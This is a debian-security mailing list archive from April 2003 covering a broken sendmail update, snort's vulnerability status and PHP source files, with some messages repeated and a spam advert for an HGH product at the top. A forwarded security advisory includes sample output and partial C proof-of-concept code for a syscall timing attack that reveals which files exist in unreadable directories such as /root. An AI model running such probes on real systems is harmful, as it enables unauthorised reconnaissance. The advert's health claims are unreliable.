You can look and feel years younger.

2003-04-04 Thread 

Are you starting to show signs of aging?

Could you afford to lose a little weight?

As seen on TV.
This is the product everyone is talking about.

http://www.mnjmtech.us/hgh4/home.html";>PUSH THIS

pzwdvyz krv cdrt
ke

Fwd: Syscall implementation could lead to whether or not a file exists

2003-04-04 Thread Phillip Hofmeister 
Not that it is a huge vulnerability I am going to loose sleep over.
Just thought I'd throw it out here for discussion.

- Forwarded message from Andrew Griffiths <[EMAIL PROTECTED]> -

From: Andrew Griffiths <[EMAIL PROTECTED]>
Subject: Syscall implementation could lead to whether or not a file exists
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Date: Thu, 03 Apr 2003 05:19:47 +1000
X-Spam-Status: No, bogofilter
Delivery-date: Fri, 04 Apr 2003 11:52:07 -0500
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030312
X-Razor-Warning: NONE.

Product: Linux and various other kernels
Tested:
- RedHat kernel 2.4.18-26.7.x (second latest ;))
- RedHat kernel 2.4.18-27.7.x
- Debian 3.0 box
- FreeBSD 4.4

Description:

Due to the implementation of various system calls,  it becomes
possible to test whether or not a file exists in a directory
that is unreadable.

Synopsis:

Filenames can be disclosed, which may be useful for other
attacks.

Problem:

By timing how long it takes for the system call to return, you
can pretty tell whether or not the file exists, because the
failure time is in my testing, three times shorter than if the
file exists.

To illistrate, here is an example of the attached program
running with the open() call. I would think other syscalls such
as stat(), mkdir(), chdir(), etc would disclose whether or not a  
file exists.


[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d-2 andrewg  andrewg  4096 Mar 20 20:37 unreachable/
[+] Timing open() on unreachable/iexist
[+] Successful: 12 usecs, got Permission denied
[+] Timing open() on unreachable/non-existant
[+] Failure: 3 usecs, got Permission denied
[+] Using 3 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
[+] /root/.bashrc exists (4 usecs), got Permission denied
[+] /root/non-existant doesn't exist (2 usecs), got Permission denied

After a while of experimentation, I found that the following
formuala seems to be relatively decent at avoiding false
positivites, on my RH box.

cutoff = ((success_time + failure_time) / 3) - 2

This is somewhat dependant on the load on the box, and where the  
file is located, though it appears.

On some OS's (notably freebsd in my testing) it will store the
results of into its cache (different to linux, in the sense that  it 
throws 
off the algo above.). Thus, if you just create a file   and time 
open()ing that, then compare it with a file that has
been recently opened, you don't get a fair comparsision.


Fix:

No known fix exists. Not exactly sure whether a fix is
appropiate, as the kernel is meant to be as fast as possible.

Exploit:
is attached.

Information is this email may be redistributed as long as the below 
signature stays attached.

Thanks,
Andrew Griffiths
-- 
Attention: Public floggings will continue until morale improves.

MidWay_/#melb-wireless licks txrxafk while his defenses are down.
 Oh boy. That could have been taken out of context.

#include 
#include 
#include 
#include 
#include 

#ifndef O_NOFOLLOW
#define O_NOFOLLOW  040 /* don't follow links */
#endif

#ifndef O_LARGEFILE
#define O_LARGEFILE 010
#endif

int flags = O_RDONLY|O_EXCL|O_SYNC|O_NOCTTY|O_NOFOLLOW;

/* taken from scuts format string example/brute_blind example */

unsigned long int
tv_diff (struct timeval *tv_a, struct timeval *tv_b)
{
unsigned long int   diff;

if (tv_a->tv_sec < tv_b->tv_sec ||
(tv_a->tv_sec == tv_b->tv_sec && tv_a->tv_sec < 
tv_b->tv_sec))
{
struct timeval *tvtmp;

tvtmp = tv_b;
tv_b = tv_a;
tv_a = tvtmp;
}

diff = (tv_a->tv_sec - tv_b->tv_sec) * 100;
if (tv_a->tv_sec == tv_b->tv_sec) {
diff += tv_a->tv_usec - tv_b->tv_usec;
} else {
if (tv_a->tv_usec >= tv_b->tv_usec)
diff += tv_a->tv_usec - tv_b->tv_usec;
else
diff -= tv_b->tv_usec - tv_a->tv_usec;
}

return (diff);
}

void cleanup()
{

printf("[+] cleaning up\n");
if(chmod("unreachable", 0700)==-1) {
printf("\t[-] Unable to revert unreachable back to being 
reachable\n");
exit(EXIT_FAILURE);
}

if(unlink("unreachable/iexist")==-1) {
printf("\t[-] Unable to remove unreachable/iexist\n");
exit(EXIT_FAILURE);
}

if(rmdir("unreachable")==-1) {
printf("\t[-] Unable to rmdir unreachable\n");
exit(EXIT_FAILURE);
}
}

int main(int a

Re: SANS Alert - Snort Vulnerability - stil Vulnerabile ?

2003-04-04 Thread Hideki Yamane 
>> > >  snort vulnerability was posted in BTS.
>> > >  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=183719
>> > > 
>> > >  # but, yes, DSA have not been released yet.
>> > 
>> Is Woody version stil Vulnerabile to this serious security bug ?
>> 
>
>The fixed version is 1.9.1.

 Yes, probably Przemek would know that, I think.
 He said "Woody version", so that question is about Woody's snort only.

 You know, Woody is "Stable" release, so  package is NOT upgraded.
 BUT when DSA(Debian Security Advisary) would be announced, new fixed 
 package would come.

 Woody's snort would be vulnerable version but there's a setting to
 avoid exploit. (maybe, so that no DSA yet?)
 

># apt-cache policy snort
>snort:
>  Installed: (none)
>  Candidate: 1.8.4beta1-3
>  Version Table:
> 1.9.1-4 0
>500 ftp://ftp.us.debian.org unstable/main Packages
> 1.8.7-4 0
>500 ftp://ftp.us.debian.org testing/main Packages
> 1.8.4beta1-3 0
>   1001 ftp://ftp.us.debian.org stable/main Packages

 I don't know "apt-cache policy " usage.
 it seems useful :) 
 

-- 
Hideki Yamane mailto:henrich @ iijmio-mail.jp, mb.kcom.ne.jp
 henrich @ azumanga-daioh.org, ma-aya.{net, to}

Re: updated sendmail package: config error

2003-04-04 Thread Steve Meyer 
I updated mine using apt-get and didn't run into a problem.  Everything 
seems to be working correctly on my side.








From: Markus Wennrich <[EMAIL PROTECTED]>
To: Miek Gieben <[EMAIL PROTECTED]>
CC: debian-security@lists.debian.org
Subject: Re: updated sendmail package: config error
Date: Fri, 4 Apr 2003 17:36:56 +0200
MIME-Version: 1.0
Received: from murphy.debian.org ([65.125.64.134]) by 
mc3-f36.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.5600); Fri, 4 Apr 
2003 08:42:56 -0800
Received: from localhost (localhost [127.0.0.1])by murphy.debian.org 
(Postfix) with QMQPid 271581FE4C; Fri,  4 Apr 2003 09:55:54 -0600 (CST)
Received: from yori.schoko.org (yori.schoko.org [62.109.128.56])by 
murphy.debian.org (Postfix) with ESMTP id BE5421FE24for 
; Fri,  4 Apr 2003 09:37:00 -0600 (CST)
Received: from yori.schoko.org ([EMAIL PROTECTED] [127.0.0.1])by 
yori.schoko.org (8.12.9/8.12.9) with ESMTP id 
h34Fau16012525(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 
verify=NO);Fri, 4 Apr 2003 17:36:56 +0200 (CEST)(envelope-from 
[EMAIL PROTECTED])
Received: (from [EMAIL PROTECTED])by yori.schoko.org 
(8.12.9/8.12.9/Submit) id h34FauX4012524;Fri, 4 Apr 2003 17:36:56 +0200 
(CEST)

X-Message-Info: JGTYoYF78jEHjJx36Oi8+Q1OJDRSDidP
Old-Return-Path: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
User-Agent: Mutt/1.5.4i
X-Spam-Status: No, hits=-3.0 
required=4.0tests=IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,SPAM_PHRASE_00_01, 
 USER_AGENT,USER_AGENT_MUTTversion=2.43

X-Spam-Level: Resent-Message-ID: <[EMAIL PROTECTED]>
Resent-From: debian-security@lists.debian.org
X-Mailing-List:  archive/latest/11468
X-Loop: debian-security@lists.debian.org
List-Post: 
List-Help: 
List-Subscribe: 

List-Unsubscribe: 


Precedence: list
Resent-Sender: [EMAIL PROTECTED]
Resent-Date: Fri,  4 Apr 2003 09:55:54 -0600 (CST)
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 04 Apr 2003 16:42:57.0279 (UTC) 
FILETIME=[3F0A10F0:01C2FAC9]


On Fri, Apr 04, 2003 at 05:01:07PM +0200, Miek Gieben wrote:
> I'm trying to install the updated sendmail packages that fix the latest
> security hole. But after the installation I get this: see below.

> 8.12.3-6.2. didn't work

Same here, with the same error-messages.

Markus


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact 
[EMAIL PROTECTED]





_
MSN 8 with e-mail virus protection service: 2 months FREE*  
http://join.msn.com/?page=features/virus

Re: updated sendmail package: config error

2003-04-04 Thread Miek Gieben 
[On 04 Apr, @19:26, Steve wrote in "Re: updated sendmail package:  ..."]
> I updated mine using apt-get and didn't run into a problem.  Everything 
> seems to be working correctly on my side.

I couldn't connect to security.debian.org. So I downloaded the packages myself
using ftp (which was still open) and installed them with dpkg. I think port 80
was closed on purpose. After security.debian.org came up again (port 80 that
is), I also installed sendmail via apt-get and this installed the updated
version, which works OK,

grtz Miek

Fwd: Syscall implementation could lead to whether or not a file exists

2003-04-04 Thread Phillip Hofmeister 
Not that it is a huge vulnerability I am going to loose sleep over.
Just thought I'd throw it out here for discussion.

- Forwarded message from Andrew Griffiths <[EMAIL PROTECTED]> -

From: Andrew Griffiths <[EMAIL PROTECTED]>
Subject: Syscall implementation could lead to whether or not a file exists
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Thu, 03 Apr 2003 05:19:47 +1000
X-Spam-Status: No, bogofilter
Delivery-date: Fri, 04 Apr 2003 11:52:07 -0500
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030312
X-Razor-Warning: NONE.

Product: Linux and various other kernels
Tested:
- RedHat kernel 2.4.18-26.7.x (second latest ;))
- RedHat kernel 2.4.18-27.7.x
- Debian 3.0 box
- FreeBSD 4.4

Description:

Due to the implementation of various system calls,  it becomes
possible to test whether or not a file exists in a directory
that is unreadable.

Synopsis:

Filenames can be disclosed, which may be useful for other
attacks.

Problem:

By timing how long it takes for the system call to return, you
can pretty tell whether or not the file exists, because the
failure time is in my testing, three times shorter than if the
file exists.

To illistrate, here is an example of the attached program
running with the open() call. I would think other syscalls such
as stat(), mkdir(), chdir(), etc would disclose whether or not a  
file exists.


[+] creating unreachable
[+] creating unreachable/iexist
[+] chmod 0'ing unreachable
[+] d-2 andrewg  andrewg  4096 Mar 20 20:37 unreachable/
[+] Timing open() on unreachable/iexist
[+] Successful: 12 usecs, got Permission denied
[+] Timing open() on unreachable/non-existant
[+] Failure: 3 usecs, got Permission denied
[+] Using 3 as our cutoff.
[+] testing /root/.bashrc and /root/non-existant
[+] /root/.bashrc exists (4 usecs), got Permission denied
[+] /root/non-existant doesn't exist (2 usecs), got Permission denied

After a while of experimentation, I found that the following
formuala seems to be relatively decent at avoiding false
positivites, on my RH box.

cutoff = ((success_time + failure_time) / 3) - 2

This is somewhat dependant on the load on the box, and where the  
file is located, though it appears.

On some OS's (notably freebsd in my testing) it will store the
results of into its cache (different to linux, in the sense that  it throws 
off the algo above.). Thus, if you just create a file   and time 
open()ing that, then compare it with a file that has
been recently opened, you don't get a fair comparsision.


Fix:

No known fix exists. Not exactly sure whether a fix is
appropiate, as the kernel is meant to be as fast as possible.

Exploit:
is attached.

Information is this email may be redistributed as long as the below 
signature stays attached.

Thanks,
Andrew Griffiths
-- 
Attention: Public floggings will continue until morale improves.

MidWay_/#melb-wireless licks txrxafk while his defenses are down.
 Oh boy. That could have been taken out of context.

#include 
#include 
#include 
#include 
#include 

#ifndef O_NOFOLLOW
#define O_NOFOLLOW  040 /* don't follow links */
#endif

#ifndef O_LARGEFILE
#define O_LARGEFILE 010
#endif

int flags = O_RDONLY|O_EXCL|O_SYNC|O_NOCTTY|O_NOFOLLOW;

/* taken from scuts format string example/brute_blind example */

unsigned long int
tv_diff (struct timeval *tv_a, struct timeval *tv_b)
{
unsigned long int   diff;

if (tv_a->tv_sec < tv_b->tv_sec ||
(tv_a->tv_sec == tv_b->tv_sec && tv_a->tv_sec < 
tv_b->tv_sec))
{
struct timeval *tvtmp;

tvtmp = tv_b;
tv_b = tv_a;
tv_a = tvtmp;
}

diff = (tv_a->tv_sec - tv_b->tv_sec) * 100;
if (tv_a->tv_sec == tv_b->tv_sec) {
diff += tv_a->tv_usec - tv_b->tv_usec;
} else {
if (tv_a->tv_usec >= tv_b->tv_usec)
diff += tv_a->tv_usec - tv_b->tv_usec;
else
diff -= tv_b->tv_usec - tv_a->tv_usec;
}

return (diff);
}

void cleanup()
{

printf("[+] cleaning up\n");
if(chmod("unreachable", 0700)==-1) {
printf("\t[-] Unable to revert unreachable back to being reachable\n");
exit(EXIT_FAILURE);
}

if(unlink("unreachable/iexist")==-1) {
printf("\t[-] Unable to remove unreachable/iexist\n");
exit(EXIT_FAILURE);
}

if(rmdir("unreachable")==-1) {
printf("\t[-] Unable to rmdir unreachable\n");
exit(EXIT_FAILURE);
}
}

int main(int argc, char **argv)
{

Re: SANS Alert - Snort Vulnerability - stil Vulnerabile ?

2003-04-04 Thread Hideki Yamane 
>> > >  snort vulnerability was posted in BTS.
>> > >  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=183719
>> > > 
>> > >  # but, yes, DSA have not been released yet.
>> > 
>> Is Woody version stil Vulnerabile to this serious security bug ?
>> 
>
>The fixed version is 1.9.1.

 Yes, probably Przemek would know that, I think.
 He said "Woody version", so that question is about Woody's snort only.

 You know, Woody is "Stable" release, so  package is NOT upgraded.
 BUT when DSA(Debian Security Advisary) would be announced, new fixed 
 package would come.

 Woody's snort would be vulnerable version but there's a setting to
 avoid exploit. (maybe, so that no DSA yet?)
 

># apt-cache policy snort
>snort:
>  Installed: (none)
>  Candidate: 1.8.4beta1-3
>  Version Table:
> 1.9.1-4 0
>500 ftp://ftp.us.debian.org unstable/main Packages
> 1.8.7-4 0
>500 ftp://ftp.us.debian.org testing/main Packages
> 1.8.4beta1-3 0
>   1001 ftp://ftp.us.debian.org stable/main Packages

 I don't know "apt-cache policy " usage.
 it seems useful :) 
 

-- 
Hideki Yamane mailto:henrich @ iijmio-mail.jp, mb.kcom.ne.jp
 henrich @ azumanga-daioh.org, ma-aya.{net, to}


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: 8.12.3-6.2 (DSA 278-1): many reports R line: null LHS (and RHS) on install

2003-04-04 Thread Miek Gieben 
[On 04 Apr, @18:01, Richard wrote in "8.12.3-6.2 (DSA 278-1): many r ..."]
> 
> Odd, I don't get these errors on the version I built and sent to the
> security team :(
> 
> If I can be of assistance in tracking this down, please let me know

6.3 works perfectly, thanks,

(What actually happened with 6.2? )

grtz Miek

Re: SANS Alert - Snort Vulnerability - stil Vulnerabile ?

2003-04-04 Thread Jeffrey L. Taylor 
Quoting Przemys?aw ?widerski <[EMAIL PROTECTED]>:
> 
> > 
> > On Tue, Mar 11, 2003 at 06:53:48PM +0900, Hideki Yamane wrote:
> > > 
> > > >This was added to the SANS Advisory on Sendmail last week.
> > > >I have not seen any news nor postings related to Snort with
> > > >Debian and was wondering about the status of Snort in stable
> > > >at this time.  
> > > 
> > >  snort vulnerability was posted in BTS.
> > >  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=183719
> > > 
> > >  # but, yes, DSA have not been released yet.
> > 
> Is Woody version stil Vulnerabile to this serious security bug ?
> 

The fixed version is 1.9.1.

# apt-cache policy snort
snort:
  Installed: (none)
  Candidate: 1.8.4beta1-3
  Version Table:
 1.9.1-4 0
500 ftp://ftp.us.debian.org unstable/main Packages
 1.8.7-4 0
500 ftp://ftp.us.debian.org testing/main Packages
 1.8.4beta1-3 0
   1001 ftp://ftp.us.debian.org stable/main Packages

Re: updated sendmail package: config error

2003-04-04 Thread Steve Meyer 
I updated mine using apt-get and didn't run into a problem.  Everything 
seems to be working correctly on my side.






From: Markus Wennrich <[EMAIL PROTECTED]>
To: Miek Gieben <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED]
Subject: Re: updated sendmail package: config error
Date: Fri, 4 Apr 2003 17:36:56 +0200
MIME-Version: 1.0
Received: from murphy.debian.org ([65.125.64.134]) by 
mc3-f36.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.5600); Fri, 4 Apr 
2003 08:42:56 -0800
Received: from localhost (localhost [127.0.0.1])by murphy.debian.org 
(Postfix) with QMQPid 271581FE4C; Fri,  4 Apr 2003 09:55:54 -0600 (CST)
Received: from yori.schoko.org (yori.schoko.org [62.109.128.56])by 
murphy.debian.org (Postfix) with ESMTP id BE5421FE24for 
<[EMAIL PROTECTED]>; Fri,  4 Apr 2003 09:37:00 -0600 (CST)
Received: from yori.schoko.org ([EMAIL PROTECTED] [127.0.0.1])by 
yori.schoko.org (8.12.9/8.12.9) with ESMTP id 
h34Fau16012525(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 
verify=NO);Fri, 4 Apr 2003 17:36:56 +0200 (CEST)(envelope-from 
[EMAIL PROTECTED])
Received: (from [EMAIL PROTECTED])by yori.schoko.org 
(8.12.9/8.12.9/Submit) id h34FauX4012524;Fri, 4 Apr 2003 17:36:56 +0200 
(CEST)
X-Message-Info: JGTYoYF78jEHjJx36Oi8+Q1OJDRSDidP
Old-Return-Path: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
User-Agent: Mutt/1.5.4i
X-Spam-Status: No, hits=-3.0 
required=4.0tests=IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,SPAM_PHRASE_00_01, 
 USER_AGENT,USER_AGENT_MUTTversion=2.43
X-Spam-Level: Resent-Message-ID: <[EMAIL PROTECTED]>
Resent-From: [EMAIL PROTECTED]
X-Mailing-List: <[EMAIL PROTECTED]> archive/latest/11468
X-Loop: [EMAIL PROTECTED]
List-Post: 
List-Help: 
List-Subscribe: 

List-Unsubscribe: 

Precedence: list
Resent-Sender: [EMAIL PROTECTED]
Resent-Date: Fri,  4 Apr 2003 09:55:54 -0600 (CST)
Return-Path: [EMAIL PROTECTED]
X-OriginalArrivalTime: 04 Apr 2003 16:42:57.0279 (UTC) 
FILETIME=[3F0A10F0:01C2FAC9]

On Fri, Apr 04, 2003 at 05:01:07PM +0200, Miek Gieben wrote:
> I'm trying to install the updated sendmail packages that fix the latest
> security hole. But after the installation I get this: see below.
> 8.12.3-6.2. didn't work

Same here, with the same error-messages.

Markus

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact 
[EMAIL PROTECTED]



_
MSN 8 with e-mail virus protection service: 2 months FREE*  
http://join.msn.com/?page=features/virus

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: updated sendmail package: config error

2003-04-04 Thread Miek Gieben 
[On 04 Apr, @19:26, Steve wrote in "Re: updated sendmail package:  ..."]
> I updated mine using apt-get and didn't run into a problem.  Everything 
> seems to be working correctly on my side.

I couldn't connect to security.debian.org. So I downloaded the packages myself
using ftp (which was still open) and installed them with dpkg. I think port 80
was closed on purpose. After security.debian.org came up again (port 80 that
is), I also installed sendmail via apt-get and this installed the updated
version, which works OK,

grtz Miek


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: updated sendmail package: config error

2003-04-04 Thread Markus Wennrich 
On Fri, Apr 04, 2003 at 05:01:07PM +0200, Miek Gieben wrote:
> I'm trying to install the updated sendmail packages that fix the latest
> security hole. But after the installation I get this: see below.

> 8.12.3-6.2. didn't work

Same here, with the same error-messages.

Markus

Re: 8.12.3-6.2 (DSA 278-1): many reports R line: null LHS (and RHS) on install

2003-04-04 Thread Miek Gieben 
[On 04 Apr, @18:01, Richard wrote in "8.12.3-6.2 (DSA 278-1): many r ..."]
> 
> Odd, I don't get these errors on the version I built and sent to the
> security team :(
> 
> If I can be of assistance in tracking this down, please let me know

6.3 works perfectly, thanks,

(What actually happened with 6.2? )

grtz Miek


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: updated sendmail package: config error

2003-04-04 Thread Miek Gieben 
[On 04 Apr, @16:44, debian-sec wrote in "updated sendmail package: conf ..."]
> hello,
> 
> I'm trying to install the updated sendmail packages that fix the latest
> security hole. But after the installation I get this: see below.
> 
> I've installed version 8.12.6-7 from testing, which runs fine. My system
> is a your basic woody system plus some packags from testing.
> 
> To summerize:
> 8.12.3-5 worked
> 8.12.3-6.2. didn't work
> 8.12.6-7 works
> 
> i'm I doing something wrong here?

ok, to reply to my own message. On another system here (all woody, no
stuff from testing), the upgrade works ok.

grtz Miek

updated sendmail package: config error

2003-04-04 Thread Miek Gieben 
hello,

I'm trying to install the updated sendmail packages that fix the latest
security hole. But after the installation I get this: see below.

I've installed version 8.12.6-7 from testing, which runs fine. My system
is a your basic woody system plus some packags from testing.

To summerize:
8.12.3-5 worked
8.12.3-6.2. didn't work
8.12.6-7 works

i'm I doing something wrong here?

[ i'm not on the this list, please cc me ]


[elektron /etc/mail]
# /etc/init.d/sendmail start
Starting Mail Transport Agent: sendmail554 5.0.0 /etc/mail/sendmail.cf: line 
649: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 649: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 652: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 652: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 653: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 653: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 654: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 654: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 655: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 655: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 656: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 656: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 657: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 657: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 658: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 658: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 659: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 659: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 660: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 660: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 661: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 661: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 662: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 662: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 663: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 663: R line: null RHS

[elektron /etc/mail]
# 554 5.0.0 /etc/mail/sendmail.cf: line 666: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 666: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 669: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 669: R line: null RHS

this goes on and on and on... had to kill it manually.


This is were the trouble starts in the sendmail.cf:

# handle null input (translate to <@> special case)
R$@ $@ <@>

# strip group: syntax (not inside angle brackets!) and trailing semicolon



grtz  Miek


--
:wq!

Re: SANS Alert - Snort Vulnerability - stil Vulnerabile ?

2003-04-04 Thread Jeffrey L. Taylor 
Quoting Przemys?aw ?widerski <[EMAIL PROTECTED]>:
> 
> > 
> > On Tue, Mar 11, 2003 at 06:53:48PM +0900, Hideki Yamane wrote:
> > > 
> > > >This was added to the SANS Advisory on Sendmail last week.
> > > >I have not seen any news nor postings related to Snort with
> > > >Debian and was wondering about the status of Snort in stable
> > > >at this time.  
> > > 
> > >  snort vulnerability was posted in BTS.
> > >  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=183719
> > > 
> > >  # but, yes, DSA have not been released yet.
> > 
> Is Woody version stil Vulnerabile to this serious security bug ?
> 

The fixed version is 1.9.1.

# apt-cache policy snort
snort:
  Installed: (none)
  Candidate: 1.8.4beta1-3
  Version Table:
 1.9.1-4 0
500 ftp://ftp.us.debian.org unstable/main Packages
 1.8.7-4 0
500 ftp://ftp.us.debian.org testing/main Packages
 1.8.4beta1-3 0
   1001 ftp://ftp.us.debian.org stable/main Packages


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Why PHP is parsing not only .php

2003-04-04 Thread François TOURDE 
Chris Francy <[EMAIL PROTECTED]> writes:

> You should probably be using the phps extension with the 
> AddType application/x-httpd-php-source .phps instead of renameing them
> to have a .txt extension.
> 

That's exactly what I do, using a symlink. So my progs are available as
progs and as source files.

But you can symlink to a .txt file too, removing any other extensions.

-- 
AMAZING BUT TRUE ...
If all the salmon caught in Canada in one year were laid end to end
across the Sahara Desert, the smell would be absolutely awful.
-- 
François TOURDE - tourde.org - 23 rue Bernard GANTE - 93250 VILLEMOMBLE
Tél: 01 49 35 96 69 - Mob: 06 81 01 81 80
eMail: mailto:[EMAIL PROTECTED] - URL: http://francois.tourde.org/

Re: updated sendmail package: config error

2003-04-04 Thread Markus Wennrich 
On Fri, Apr 04, 2003 at 05:01:07PM +0200, Miek Gieben wrote:
> I'm trying to install the updated sendmail packages that fix the latest
> security hole. But after the installation I get this: see below.

> 8.12.3-6.2. didn't work

Same here, with the same error-messages.

Markus


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: updated sendmail package: config error

2003-04-04 Thread Miek Gieben 
[On 04 Apr, @16:44, debian-sec wrote in "updated sendmail package: conf ..."]
> hello,
> 
> I'm trying to install the updated sendmail packages that fix the latest
> security hole. But after the installation I get this: see below.
> 
> I've installed version 8.12.6-7 from testing, which runs fine. My system
> is a your basic woody system plus some packags from testing.
> 
> To summerize:
> 8.12.3-5 worked
> 8.12.3-6.2. didn't work
> 8.12.6-7 works
> 
> i'm I doing something wrong here?

ok, to reply to my own message. On another system here (all woody, no
stuff from testing), the upgrade works ok.

grtz Miek


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

RE: SANS Alert - Snort Vulnerability - stil Vulnerabile ?

2003-04-04 Thread Przemysław Świderski 

> 
> On Tue, Mar 11, 2003 at 06:53:48PM +0900, Hideki Yamane wrote:
> > 
> > >This was added to the SANS Advisory on Sendmail last week.
> > >I have not seen any news nor postings related to Snort with
> > >Debian and was wondering about the status of Snort in stable
> > >at this time.  
> > 
> >  snort vulnerability was posted in BTS.
> >  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=183719
> > 
> >  # but, yes, DSA have not been released yet.
> 
Is Woody version stil Vulnerabile to this serious security bug ?

-- 
Przemek

updated sendmail package: config error

2003-04-04 Thread Miek Gieben 
hello,

I'm trying to install the updated sendmail packages that fix the latest
security hole. But after the installation I get this: see below.

I've installed version 8.12.6-7 from testing, which runs fine. My system
is a your basic woody system plus some packags from testing.

To summerize:
8.12.3-5 worked
8.12.3-6.2. didn't work
8.12.6-7 works

i'm I doing something wrong here?

[ i'm not on the this list, please cc me ]


[elektron /etc/mail]
# /etc/init.d/sendmail start
Starting Mail Transport Agent: sendmail554 5.0.0 /etc/mail/sendmail.cf: line 649: R 
line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 649: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 652: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 652: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 653: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 653: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 654: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 654: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 655: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 655: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 656: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 656: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 657: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 657: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 658: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 658: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 659: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 659: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 660: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 660: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 661: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 661: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 662: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 662: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 663: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 663: R line: null RHS

[elektron /etc/mail]
# 554 5.0.0 /etc/mail/sendmail.cf: line 666: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 666: R line: null RHS
554 5.0.0 /etc/mail/sendmail.cf: line 669: R line: null LHS
554 5.0.0 /etc/mail/sendmail.cf: line 669: R line: null RHS

this goes on and on and on... had to kill it manually.

